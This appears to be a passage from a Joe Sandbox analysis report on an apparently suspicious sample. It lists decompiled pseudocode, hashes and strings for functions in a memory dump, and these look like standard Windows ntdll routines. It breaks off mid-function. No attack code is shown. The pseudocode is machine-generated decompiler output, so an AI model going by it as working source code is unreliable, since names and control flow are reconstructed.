                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: 096b484a2cf816727b3e0a539c3761b2dc70394218a7af4c197a9d247120c480
                                                              • Instruction ID: 17c5a60c4411d8ce2398ba5207fa60b39e605aa223ed0ea33e19cd33a4ea94b0
                                                              • Opcode Fuzzy Hash: 096b484a2cf816727b3e0a539c3761b2dc70394218a7af4c197a9d247120c480
                                                              • Instruction Fuzzy Hash: C2317AB5509305AFC721DF28C9819ABBBE8FB99764F10092EF99497210E734DD08CB93
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A31B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 72%
                                                              			E00A31B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E00A6BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E00A6A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E00A6A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L00A44620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                              0x00a31b8f
                                                              0x00a31b9a
                                                              0x00a31b9c
                                                              0x00a31b9e
                                                              0x00a31ba3
                                                              0x00a87010
                                                              0x00a87010
                                                              0x00000000
                                                              0x00a31ba9
                                                              0x00a31ba9
                                                              0x00a31bae
                                                              0x00000000
                                                              0x00a31bc5
                                                              0x00a31bca
                                                              0x00a31bcf
                                                              0x00a31bd0
                                                              0x00a31bd1
                                                              0x00a31bd2
                                                              0x00a31bd6
                                                              0x00a31bdc
                                                              0x00a31be0
                                                              0x00a86ffc
                                                              0x00a87000
                                                              0x00000000
                                                              0x00a87006
                                                              0x00a87009
                                                              0x00a87009
                                                              0x00a31be6
                                                              0x00a31bec
                                                              0x00a31c0b
                                                              0x00a31c0b
                                                              0x00a31c0c
                                                              0x00a31c11
                                                              0x00a31c12
                                                              0x00a31c15
                                                              0x00a31c1b
                                                              0x00a31c1f
                                                              0x00a31c31
                                                              0x00a31c33
                                                              0x00a87026
                                                              0x00a87026
                                                              0x00a31c21
                                                              0x00a31c24
                                                              0x00a31c24
                                                              0x00a31bee
                                                              0x00a31bee
                                                              0x00a31bf2
                                                              0x00a31c3a
                                                              0x00a31bf4
                                                              0x00a31bf4
                                                              0x00a31c05
                                                              0x00a31c05
                                                              0x00a31c09
                                                              0x00a31c3e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a31c09
                                                              0x00a31bec
                                                              0x00a31be0
                                                              0x00a31bae
                                                              0x00a31c2e

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: WindowsExcludedProcs
                                                              • API String ID: 0-3583428290
                                                              • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                              • Instruction ID: 616f69b971c9526c9c08249b221a32faca4ab350484ba408d08ed5c696b370cb
                                                              • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                              • Instruction Fuzzy Hash: E121F277540228ABCB21AB59C940F6FB7BDAF81B50F264825F904DB200D634DC0197B0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A4F716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00A4F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                              0x00a4f71d
                                                              0x00a4f722
                                                              0x00a4f726
                                                              0x00a94770
                                                              0x00a4f765
                                                              0x00a4f769
                                                              0x00a4f769
                                                              0x00a4f732
                                                              0x00a9477a
                                                              0x00000000
                                                              0x00a9477a
                                                              0x00a4f738
                                                              0x00a4f73a
                                                              0x00a4f73c
                                                              0x00a4f73f
                                                              0x00a4f746
                                                              0x00a4f778
                                                              0x00a4f7a9
                                                              0x00a4f7a9
                                                              0x00a4f754
                                                              0x00a4f75a
                                                              0x00a4f75d
                                                              0x00a4f75f
                                                              0x00a4f761
                                                              0x00a4f76f
                                                              0x00a4f771
                                                              0x00a4f771
                                                              0x00a4f76f
                                                              0x00a4f763
                                                              0x00000000
                                                              0x00a4f763
                                                              0x00a4f77d
                                                              0x00a4f7a3
                                                              0x00a4f7a5
                                                              0x00000000
                                                              0x00a4f7a5
                                                              0x00a4f77f
                                                              0x00a4f782
                                                              0x00a4f784
                                                              0x00a4f786
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a4f788
                                                              0x00a4f748
                                                              0x00a4f74d
                                                              0x00a4f78d
                                                              0x00a4f793
                                                              0x00a4f7b7
                                                              0x00a4f7bc
                                                              0x00000000
                                                              0x00a4f7bc
                                                              0x00a4f798
                                                              0x00000000
                                                              0x00000000
                                                              0x00a4f79d
                                                              0x00a4f7b0
                                                              0x00000000
                                                              0x00a4f7b0
                                                              0x00a4f79f
                                                              0x00000000
                                                              0x00a4f74f
                                                              0x00a4f74f
                                                              0x00000000
                                                              0x00a4f74f

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Actx
                                                              • API String ID: 0-89312691
                                                              • Opcode ID: e07775d8e214be98dcc6e7fdc503edeefd6d08d814d414c66f1142c90f5888ed
                                                              • Instruction ID: 1e2e2d4e3356914ab56dce9eab1498063f747962556a19f9844261e35828e4d9
                                                              • Opcode Fuzzy Hash: e07775d8e214be98dcc6e7fdc503edeefd6d08d814d414c66f1142c90f5888ed
                                                              • Instruction Fuzzy Hash: 8311BF3DB446028FEB244F1D889073672E6ABD6724F34653AE462CB791DBBCCC418740
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AD8DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 71%
                                                              			E00AD8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0xb00d50);
				E00A7D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E00AB5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L00A7DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L00A7DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E00A7D130(_t34, _t39, _t40);
			}





                                                              0x00ad8df1
                                                              0x00ad8df1
                                                              0x00ad8df1
                                                              0x00ad8df1
                                                              0x00ad8df1
                                                              0x00ad8df1
                                                              0x00ad8df3
                                                              0x00ad8df8
                                                              0x00ad8dfd
                                                              0x00ad8e00
                                                              0x00ad8e0e
                                                              0x00ad8e2a
                                                              0x00ad8e36
                                                              0x00ad8e38
                                                              0x00ad8e3c
                                                              0x00ad8e46
                                                              0x00ad8e46
                                                              0x00ad8e36
                                                              0x00ad8e50
                                                              0x00ad8e56
                                                              0x00ad8e59
                                                              0x00ad8e5c
                                                              0x00ad8e60
                                                              0x00ad8e67
                                                              0x00ad8e6d
                                                              0x00ad8e73
                                                              0x00ad8e74
                                                              0x00ad8eb1
                                                              0x00ad8ebd

                                                              Strings
                                                              • Critical error detected %lx, xrefs: 00AD8E21
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Critical error detected %lx
                                                              • API String ID: 0-802127002
                                                              • Opcode ID: 3cc133cd51b00db009d1fbf7fcde925230461c5749196a0835e4c6fd08071610
                                                              • Instruction ID: 922bcb2e59ecccd4d7900e882d464f15058e501bd82481a728563088799a7535
                                                              • Opcode Fuzzy Hash: 3cc133cd51b00db009d1fbf7fcde925230461c5749196a0835e4c6fd08071610
                                                              • Instruction Fuzzy Hash: E3115B71D14348DADF25DFA889067DCBBB0BF04714F20825EE42AAB392CB788602CF14
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00ABFF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 00ABFF60
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                              • API String ID: 0-1911121157
                                                              • Opcode ID: 3b0fdb2e01410382d21acc03df0d775bc9039a73620062a1e4fd09714d6897ef
                                                              • Instruction ID: 4c74d93d6794f91c4ad3948f84d4e2d5d8666d42d22bbba8baf3f7c454c02ff6
                                                              • Opcode Fuzzy Hash: 3b0fdb2e01410382d21acc03df0d775bc9039a73620062a1e4fd09714d6897ef
                                                              • Instruction Fuzzy Hash: 3211CE71910144EFCB22EB60CE49FE8BBB5FF08704F58C064F009671A2CB399990CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00AF5BA5 Relevance: .6, Instructions: 592COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 88%
                                                              			E00AF5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0xb01178);
				E00A7D0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E00AF4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E00A6D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E00AF5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0xb160e8;
								if( *0xb160e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0xb160e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E00A69710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E00A66DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E00A6F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E00A6F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E00A6F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E00A6FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E00A6FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
